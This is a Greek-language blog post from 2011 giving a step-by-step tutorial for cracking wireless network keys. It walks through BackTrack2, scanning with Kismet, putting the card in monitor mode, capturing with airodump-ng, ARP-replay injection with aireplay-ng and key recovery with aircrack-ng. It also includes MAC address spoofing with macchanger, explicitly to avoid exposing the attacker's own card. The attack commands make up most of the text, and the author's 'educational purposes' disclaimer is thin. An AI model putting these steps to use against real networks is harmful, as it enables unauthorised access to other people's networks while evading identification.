p

Πέμπτη 3 Φεβρουαρίου 2011

Πως να σπάσετε κλειδιά ασυρμάτων δικτύων.

Θα σας δωσω το παρακατω tutorial. Εγώ άπλα το δημοσιεύω χωρίς να φέρω ευθύνη το πως θα το χρησιμοποιησετε. Καθαρά για εκπαιδευτικούς σκοπούς θα το κάνω. Μην με εκθεσετε.




1)Κατεβάζουμε το BackTrack2 Live CD.Είναι σε μορφή iso.Το καίμε σε ένα δισκάκι και το βάζουμε να bootαρει από αυτο.Οποιος δεν θελει να χρησιμοποιήσει Linux στον υπολογιστή του γιατί φοβατε μην τον βρομίσει η χαρά του σταμάτα εδω.Steve η καμπάνα χτυπα.Την ακούς;

Πάντως έχει φοβερά εργαλεία για sniffing, spoofing ManInTheMiddle Attack κ.α.

2)Menu->Backtrack->80211->Kismet

Ανοίγει εφαρμογή,βάζοντας την ασύρματη κάρτα σε κατάσταση παρακολούθησης(monitor mode).Εάν έχετε κουμπί που το πατάτε για να ενεργοποιηθεί η ασύρματη κάρτα (κυρίως για λαπτοπ) πατήστε το.Σε λίγο θα δείτε αν υπάρχουν ασύρματα δίκτυα κοντά.Το καλό είναι ότι εντοπίζει και "μη ορατά" ασύρματα δίκτυα.Με λίγα λόγια το Kismet είναι τέλειο.

Σύντομο Manual:

Πλοηγούμαστε με τα βελακια.Αν πληκτρολογήσουμε h παίρνουμε βοηθεια.Για να δεις πληροφορίες για το δίκτυο πρέπει πρώτα να πατήσεις το s συντόμευση του sort(ταξινόμηση)και μετά ένα γράμμα από το μενού που θα βγάλει,όποιο να ναι πχ f για first seen.Επειτα πατάς το i (information) και εκεί χρειάζεσαι:

1. τον αριθμό του καναλιού που εκπέμπει το δίκτυο πχ channel
2. το essid που είναι το όνομα του δικτύου
3. τέλος,τη διεύθυνση ΜΑC (MAC Address) που είναι της μορφής ff:ff:ff:ff:ff:ff

Κάπου εκεί αναφέρει και τι ασφάλεια έχει το δίκτυο (WEP, WPA κτλ).Πατάς q (quit) και σε βγάζει πίσω στην οθόνη με τα δίκτυα.Εκεί πληκτρολογείς c και σου δείχνει τους πελάτες (clients) οι οποίοι είναι συνδεδεμένοι στο δίκτυο αυτό.Καλο θα είναι να γράψουμε την MAC Address του για τι θα μας χρησιμεύσει αργότερα.

Κλείνουμε το Kismet με Shift+q.

3)Ανοιγουμε μια κονσόλα(Terminal).

4)Δεινουμε την εντολή iwconfig

Εκεί παίρνουμε πληροφορίες μόνο για τις ασύρματες κάρτες του υπολογιστή μας.Εμεις πρέπει να δούμε το όνομα της κάρτας,πχ wlan0.Στις πληροφορίες για την ασύρματη κάρτα σου δές το Mode.Θέλουμε να γράφει Mode:Monitor.Εάν δεν το γράφει δώσε εντολή
iwconfig wlan0 mode monitor ή airmon-ng start wlan0.Ξαναδώσε εντολή iwconfig και επαλήθευσε ότι γράφει Mode Monitor.

5)Για να μην εκθέσουμε την MAC Address της ασύρματης κάρτας μας καλό είναι να την αλλάξουμε με το macchanger

Δώστε την εντολή macchanger -m ff:ff:ff:ff:ff:ff wlan0

Οπου ff βαλτε γράμματα και αριθμούς μαζι.Πχ. F3:34:00:1B:E5:1G

6)Δώστε την εντολή airodump-ng --write test --channel # wlan0

Όπου # ο αριθμός του καναλιού στο οποίο βρίσκεται το δίκτυο.Ετσι γράφουμε τα πακέτα που ακούει από το κανάλι # σε ένα αρχείο με όνομα test.Αν δεν δώσουμε κανάλι αναγκάζουμε το πρόγραμμα να πάει από κανάλι σε κανάλι εμφανίζοντας κάτι τέτοιο:

CH:πάνω αριστερά,που δείχνει το κανάλι που του είπαμε να βλέπει.

BSSID: η διεύθυνση MAC του δικτύου.

ESSID: εάν μεγαλώσεις κατά πλάτος το παράθυρο θα δείς το όνομα του δικτύου κάτω από το ESSID.

Data: είναι αυτά που χρειαζόμαστε.

STATION: είναι η MAC διεύθυνση των πελάτων που είναι συνδεδεμένοι στo δίκτυο, του οποίου η MAC διεύθυνση αναφέρεται αριστερά από το STATION.

7)Ανοίξτε ακόμα μια κονσόλα χωρίς να κλείσετε την προηγούμενη.

Δώστε την εντολή aireplay-ng -3 -b MAC Δικτύου -h MAC πελάτη wlan0

Την MAC του δικτύου την βλέπουμε αν πατήσουμε iwconfig και δουμε το Access Point.Την MAC πελάτη την έχουμε σημειώσει από πριν.

Θα δούμε ένα μήνυμα το οποίο σου λέει πως η διεύθυνση της κάρτας σου δεν ταιριάζει με αυτή που έβαλες.Δεν μας πειράζει αυτό.Στέλνει πακέτα και λαμβάνει και μέσα σε παρένθεση είναι τα DATA που βλέπεις και στο airodump-ng.Το αφήνουμε να κάνει την δουλειά του.Αν τα DΑΤΑ αυξάνονται σιγά σιγά αστραπιαία,είμαστε σε κάλο δρόμο.

Με την ωρα αν ειμαστε λιγο τυχεροι το κλειδι θα ειναι στα χερια μας.

8.)Προαιρετικά μπορούμε να κατεβάσουμε το aircrack-ng version 0.9.

Αυτήν η εκδοσή χρειάζεται μόνο 70.000 - 100.000 πακέτα για να αποκαλύψει τον κωδικό.

Για να το κατεβασουμε δεινουμε την εξης εντολη:

wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz

Αν δεν έχεις internet,πήγε στην διεύθυνση πάνω,κατέβασε το,βάλτο σε φλασακι,άνοιξε το φλασάκι κανε copy το αρχείο στην επιφάνεια εργασίας ή μέσα στο /home.

Ανοιξε ενα τερματικο και πληκτρολογισε τα παρακατω:

tar -zxvf aircrack-ng-0.9.tar.gz αν το εχεις στο /home αλλιως tar -zxvf /Desktop/aircrack-ng-0.9.tar.gz αν το εχεις στην επιφανεια εργασιας.

Μέτα πληκτρολόγησε μια μια της παρακάτω γραμμές.

cd aircrack-ng-0.9

make

make install

9)Αν θέλετε να τρέξετε την νέα εκδοσή πατήστε aircrack-ng και αν θέλετε να τρέξετε την νέα εκδοσή για να γράψετε κάτι σε ένα αρχείο πατήστε aircrack-ng -z -b MAC-Δικτυου test*.cap

Αυτά ισχύουν για όλες τις κάρτες άλλα με τις Intel υπήρχε αναφορά ότι δεν υπάρχει συμβατότητα με Centrino Chip και Intel κάρτες.Λυση υπαρχει.Δημιουργούμε μία δεύτερη πρόσοψη (interface) η οποία θα "ακούει" από την ασύρματη κάρτα.Αυτη η πρόσοψη θα χρησιμοποιηθεί στο airodump δηλαδή θα μπεί σε λειτουργία monitor ενώ η κανονική ασύρματη κάρτα πχ wlan0 θα ναι σε Mode Managed και θα χρησιμοποιηθεί στο aireplay.

Ακολουθούν οι εντολές με την σειρα.Για να σας βγει τις εκτελείτε μια μια τις εντολές χωρίς να ξεχνάτε να πατάτε Enter στο τέλος κάθε εντολής.

Ανοίξτε μια κονσόλα και πάμε:

iwconfig βλέπεις το interface της ασύρματης κάρτας πχ wlan0
iwlist wlan0 scan βλέπεις τα δίκτυα γύρω σου
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig wlan0 essid ΟΝΟΜΑ-ΔΙΚΤΥΟΥ channel # key s:fakekey mode managed
ifconfig wlan0 up
ifconfig rtap0 up
airodump-ng --bsssid MAC-Δικτύου --channel # -w test rtap0
aireplay-ng -3 -a MAC-Δικτύου -h MAC-της-κάρτας-σου -i rtap0 wlan0

ή δεύτερη λύση

aireplay-ng -3 -b MAC-Δικτυου -h MAC-Διεύθυνση-Πελάτη -i rtap0 wlan0
aircrack-ng -z test*.cap